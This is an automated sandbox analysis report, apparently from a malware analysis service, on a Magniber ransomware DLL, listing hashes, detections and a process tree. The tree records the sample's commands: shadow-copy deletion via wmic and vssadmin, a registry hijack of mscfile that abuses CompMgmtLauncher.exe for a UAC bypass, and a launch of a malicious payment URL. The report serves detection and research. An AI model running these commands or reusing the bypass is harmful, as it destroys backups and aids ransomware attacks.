Analysis
-
max time kernel
0s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28-12-2023 06:53
Static task
static1
Behavioral task
behavioral1
Sample
cd711f77c71b93a29494bba27afebb32.dll
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cd711f77c71b93a29494bba27afebb32.dll
Resource
win10v2004-20231215-en
General
-
Target
cd711f77c71b93a29494bba27afebb32.dll
-
Size
38KB
-
MD5
cd711f77c71b93a29494bba27afebb32
-
SHA1
a0d84f184191454e90d4bb2b7df52f8428a3b387
-
SHA256
4bf92967b0d2aabec0cb16f3c3792e714857db3e41ad5768e3493780b9342465
-
SHA512
5ad95f1fd3365a51d6438f054ecc7b849a3ef8197592403504e227402629b7b482e403e652aa0da36c7dd4f6733351639497c1de6d58df51876b906d7b261bec
-
SSDEEP
768:e04Jtvq/PbXsmSh5Mj13C05bRUSMI2mpKghGR5ZL4Z/DtChqYWrYBZF:MJtvupS/Mj13CAUTI2mpF85ZcZ/JSN
Malware Config
Signatures
-
Detect magniber ransomware 2 IoCs
resource yara_rule behavioral1/memory/2508-41-0x0000000001FD0000-0x0000000002813000-memory.dmp family_magniber behavioral1/memory/1116-281-0x0000000002170000-0x0000000002174000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (85) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2508 set thread context of 1116 2508 rundll32.exe 12 PID 2508 set thread context of 1172 2508 rundll32.exe 80 PID 2508 set thread context of 1200 2508 rundll32.exe 79 PID 2508 set thread context of 1632 2508 rundll32.exe 78 -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1280 vssadmin.exe 1944 vssadmin.exe 1916 vssadmin.exe 1716 vssadmin.exe 2852 vssadmin.exe -
Modifies registry class 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000_CLASSES\mscfile\shell\open taskhost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2464 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2508 rundll32.exe 2508 rundll32.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2508 rundll32.exe 2508 rundll32.exe 2508 rundll32.exe 2508 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 1200 Explorer.EXE 1200 Explorer.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1116 wrote to memory of 2464 1116 taskhost.exe 73 PID 1116 wrote to memory of 2464 1116 taskhost.exe 73 PID 1116 wrote to memory of 2464 1116 taskhost.exe 73 PID 1116 wrote to memory of 2576 1116 taskhost.exe 18 PID 1116 wrote to memory of 2576 1116 taskhost.exe 18 PID 1116 wrote to memory of 2576 1116 taskhost.exe 18 PID 1116 wrote to memory of 2268 1116 taskhost.exe 17 PID 1116 wrote to memory of 2268 1116 taskhost.exe 17 PID 1116 wrote to memory of 2268 1116 taskhost.exe 17 PID 2268 wrote to memory of 1536 2268 cmd.exe 15 PID 2268 wrote to memory of 1536 2268 cmd.exe 15 PID 2268 wrote to memory of 1536 2268 cmd.exe 15
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2268
-
-
C:\Windows\system32\cmd.execmd /c "start http://46b05248c6a030d01aokdpgmu.iflook.club/okdpgmu^&2^&47025584^&85^&383^&12"2⤵PID:2576
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://46b05248c6a030d01aokdpgmu.iflook.club/okdpgmu&2&47025584&85&383&123⤵PID:2332
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2332 CREDAT:275457 /prefetch:24⤵PID:1596
-
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2464
-
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"1⤵PID:1536
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""1⤵PID:1668
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"2⤵PID:696
-
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"1⤵PID:1788
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵PID:2612
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2180
-
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵PID:2780
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2428
-
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"1⤵PID:2880
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1944
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2452
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1916
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1716
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2852
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1280
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"1⤵PID:2072
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"1⤵PID:2348
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵PID:2712
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵PID:1960
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe1⤵PID:2900
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵PID:2756
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵PID:2340
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵PID:2468
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵PID:2384
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵PID:3004
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"1⤵PID:2128
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"1⤵PID:3008
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""1⤵PID:808
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""1⤵PID:1036
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""1⤵PID:500
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\cd711f77c71b93a29494bba27afebb32.dll,#11⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2508
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1632
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:1200
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1172